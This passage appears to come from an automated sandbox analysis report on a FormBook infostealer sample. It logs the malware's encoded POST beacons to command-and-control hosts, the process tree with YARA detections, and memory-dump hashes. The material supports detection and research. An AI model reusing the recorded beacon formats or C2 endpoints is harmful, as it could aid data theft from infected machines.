                                                                                                                                                           Dec 8, 2023 14:53:26.606487036 CET | 1286 | IN | Data Ascii: },e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf("ucbrowser")>=0||n.indexOf("ucmobile")>=0}function r(){return window.navigator
                                                                                                                                                           Dec 8, 2023 14:53:26.606501102 CET | 1286 | IN | Data Ascii: i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1"):send(s)}reportLoading(),console.log("UA
                                                                                                                                                           Dec 8, 2023 14:53:26.606513977 CET | 1271 | IN | Data Ascii: Attribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=window.innerWidth/.75;document.querySelector("html").style.fontSize=fontSize+"px


                                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                           49 | 192.168.2.4 | 49789 | 37.97.254.27 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                           Dec 8, 2023 14:53:32.316797972 CET | 759 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.wrautomotive.online
                                                                                                                                                            Origin: http://www.wrautomotive.online
                                                                                                                                                            Referer: http://www.wrautomotive.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=0gIjKnK2BJtevHKZCgtS1sMyyVVH0vy66LHt8W/V4WLlF/aQfG2nKBXF9Es9EVY+CdEoTKgcS2HF3K2vsNPx6YLsFnskiMJsZhtZOdDD5myNK8Krm9SIURsvZOltOkzwkGL8UBoVQyz4HWczQMlaRKiRynzw/rH28KAkfwFNn/lxF0BYPQ==
                                                                                                                                                           Dec 8, 2023 14:53:32.552953959 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                           50 | 192.168.2.4 | 49790 | 37.97.254.27 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                           Dec 8, 2023 14:53:35.076858044 CET | 779 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.wrautomotive.online
                                                                                                                                                            Origin: http://www.wrautomotive.online
                                                                                                                                                            Referer: http://www.wrautomotive.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lvlEa+QY32nLBXFykt3K1ZTCdJVTLMcS2jF3Lqvs+3w7ILiIHsmmMJsZhtZOdHp5mqNKMarnZGLVRsueOltKkz0kGLSUAlyQxb4HUEzQ9lbbKit9Hy+/piI36p+Uwth6rQCNBtLIubPfIM5lMBSzbNI2E0KqWo=
                                                                                                                                                           Dec 8, 2023 14:53:35.313324928 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                           51 | 192.168.2.4 | 49791 | 37.97.254.27 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                           Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                           Dec 8, 2023 14:53:37.848824024 CET | 10861 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.wrautomotive.online
                                                                                                                                                            Origin: http://www.wrautomotive.online
                                                                                                                                                            Referer: http://www.wrautomotive.online/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:38.088500977 CET | 188 | IN | HTTP/1.0 403 Forbidden
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 52 65 71 75 65 73 74 20 66 6f 72 62 69 64 64 65 6e 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 76 65 20 72 75 6c 65 73 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            52 | 192.168.2.4 | 49792 | 37.97.254.27 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:40.611998081 CET | 476 | OUT | GET /ahec/?XveXHZvx=5igDJT3zPYxoznSfOhoK1Ng2m3hD5JqRz+D9mmXj9CLVcvHmJGefSTTLw3ACEWBDJ4ZMU5QrLRnI3LOtkf+25ITAAVo7msZgdw==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.wrautomotive.online
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:53:40.852206945 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Sep 2023 17:56:11 GMT
                                                                                                                                                            Server: Apache
                                                                                                                                                            Last-Modified: Thu, 04 Nov 2021 09:16:05 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            X-Varnish: 673959887 3
                                                                                                                                                            Age: 6897449
                                                                                                                                                            Via: 1.1 varnish (Varnish/6.1)
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 64668
                                                                                                                                                            Connection: close
                                                                                                                                                            Data Ascii: <!DOCTYPE html><html> <head lang="en"> <meta charset="ascii"> <title>TransIP - Reserved domain</title> <meta name="description" content="TransIP - Reserved domain"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="robots" content="noindex, nofollow"> <link rel="shortcut icon" href="//reserved.transip.nl/assets/img/favicon.ico" type="image/x-icon" /> <link href='https://fonts.googleapis.com/css?family=Source+Sans+Pro:400,900' rel='stylesheet' type='text/css'> <link rel="stylesheet" href="//reserved.transip.nl/assets/css/combined-min.css"> <title>Bezet!</title> </head> <body> <div class="container"> <div role="navigation" class="reserved-nav-container"> <div class="col-xs-6 reserved-nav-left reserved-nav-brand">


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            53 | 192.168.2.4 | 49793 | 52.220.48.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:47.452611923 CET | 738 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 70 4f 56 4f 61 49 44 38 37 38 67 41 45 65 64 4a 63 56 4a 55 52 74 6e 62 56 58 35 56 5a 6d 53 79 75 34 45 42 48 41 6c 2b 47 38 36 45 4f 6d 47 39 67 4c 6a 63 63 69 44 71 59 68 66 45 36 72 51 47 33 4d 67 75 48 51 30 33 4b 58 43 79 5a 66 45 4c 70 6f 6e 59 5a 59 41 34 2b 5a 52 39 67 36 4d 77 2b 4d 44 5a 65 75 4b 62 2b 36 39 46 70 46 37 4a 75 46 30 4b 32 45 4b 47 55 4b 55 57 6e 77 52 43 54 44 69 58 34 54 49 53 6b 43 44 30 37 62 33 4e 51 54 73 54 48 4a 53 65 48 6b 73 50 66 42 2f 63 63 65 73 42 36 67 35 74 78 47 39 54 2f 31 69 6e 7a 41 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=pOVOaID878gAEedJcVJURtnbVX5VZmSyu4EBHAl+G86EOmG9gLjcciDqYhfE6rQG3MguHQ03KXCyZfELponYZYA4+ZR9g6Mw+MDZeuKb+69FpF7JuF0K2EKGUKUWnwRCTDiX4TISkCD07b3NQTsTHJSeHksPfB/ccesB6g5txG9T/1inzA==
                                                                                                                                                            Dec 8, 2023 14:53:47.872071981 CET | 363 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:47 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                            54 | 192.168.2.4 | 49794 | 52.220.48.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                            Dec 8, 2023 14:53:50.336647034 CET | 758 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Ascii: XveXHZvx=pOVOaID878gAF/tJaEJUANmpZ35VTGS2u4YBHCJuGKKENEO9jODcfiDqAxfB5bQd3MsMHVM3KXGyZdcLubPfZIAm25R/k6Mw+MDZeuex+6lFp1LJsgUN8kKBdqUWxwRGTDj44WpHkEH07bnNQA0MNJSYY0tfQTDQYete0RtTuSZD+gO0074qKQJghVO9eUeVGu9vPLM=
Dec 8, 2023 14:53:50.694278002 CET | 363 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:50 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.4 | 49795 | 52.220.48.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:53:53.437545061 CET | 10840 | OUT | POST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Origin: http://www.npstore.asia
                                                                                                                                                            Referer: http://www.npstore.asia/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Data Ascii: XveXHZvx=[...]
Dec 8, 2023 14:53:53.798593044 CET | 363 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:53 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.4 | 49796 | 52.220.48.161 | 80 | 5016 | C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
Timestamp | Bytes transferred | Direction | Data
Dec 8, 2023 14:53:57.335622072 CET | 469 | OUT | GET /ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.npstore.asia
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
Dec 8, 2023 14:53:57.689404964 CET | 488 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                                                            Server: openresty
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:53:57 GMT
                                                                                                                                                            Content-Type: text/html
                                                                                                                                                            Content-Length: 166
                                                                                                                                                            Connection: close
                                                                                                                                                            Location: https://www.npstore.asia/ahec/?XveXHZvx=kM9uZ8DSycwmMd9mOUcNXsu3ZVxRbXOcoIpBdgpgHsmMTTfOm57EajrucSnL0rM/85NSIBYnKSu3X+covYz9Y5Yt4Y8akrMm9Q==&l4xX=rDStpH0He
                                                                                                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                                                                                                                            Target ID:0
                                                                                                                                                            Start time:14:49:54
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Imagebase:0xa60000
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5 hash:26C7731786626894CE4FCC339951A26B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:2
                                                                                                                                                            Start time:14:49:56
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Users\user\Desktop\WrrCV4QR2J.exe
                                                                                                                                                            Imagebase:0x9d0000
                                                                                                                                                            File size:786'432 bytes
                                                                                                                                                            MD5 hash:26C7731786626894CE4FCC339951A26B
                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1791548319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1793042064.0000000004140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1791836108.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:true

                                                                                                                                                            Target ID:3
                                                                                                                                                            Start time:14:49:59
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe"
                                                                                                                                                            Imagebase:0xa0000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4121341224.0000000004FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:4
                                                                                                                                                            Start time:14:50:01
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:C:\Windows\SysWOW64\isoburn.exe
                                                                                                                                                            Imagebase:0x1e0000
                                                                                                                                                            File size:107'008 bytes
                                                                                                                                                            MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4120529651.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4121516718.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4121554495.0000000004700000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:low
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:6
                                                                                                                                                            Start time:14:50:12
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            Wow64 process (32bit):true
                                                                                                                                                            Commandline:"C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe"
                                                                                                                                                            Imagebase:0xa0000
                                                                                                                                                            File size:140'800 bytes
                                                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Yara matches:
                                                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.4122987112.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:false

                                                                                                                                                            Target ID:9
                                                                                                                                                            Start time:14:50:24
                                                                                                                                                            Start date:08/12/2023
                                                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                            Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                                                                            File size:676'768 bytes
                                                                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                            Reputation:moderate
                                                                                                                                                            Has exited:true


                                                                                                                                                              Execution Graph

                                                                                                                                                              Execution Coverage:8%
                                                                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                              Signature Coverage:0%
                                                                                                                                                              Total number of Nodes:187
                                                                                                                                                              Total number of Limit Nodes:9
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 04fcce7cb3370c2bd34ac4c631f6e50a9bb43b4e1354f964602275e565d7d5a8
                                                                                                                                                              • Instruction ID: f64b0b48995c4158a09c027c917427fa41d626688d0674f2140d9f3c25e66681
                                                                                                                                                              • Opcode Fuzzy Hash: 04fcce7cb3370c2bd34ac4c631f6e50a9bb43b4e1354f964602275e565d7d5a8
                                                                                                                                                              • Instruction Fuzzy Hash: 82910571E05219DFDB19CFA6D9916DEFBB2BF89300F20942AD45AA7314DB349906CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1683925333.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_2db0000_WrrCV4QR2J.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 4a82f99ea9c7b3b7dcd4c7beea089abd50792586a60cceb2b71701142b59d8d4
                                                                                                                                                              • Instruction ID: 006024d4bc0233275498f32f473a058524193fe5d37569a693251339110f8bb6
                                                                                                                                                              • Opcode Fuzzy Hash: 4a82f99ea9c7b3b7dcd4c7beea089abd50792586a60cceb2b71701142b59d8d4
                                                                                                                                                              • Instruction Fuzzy Hash: D0A1F470D05219DFDB18CFA6C9955DEFBB2FF89300F20942AD52AAB214DB349906CF40
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
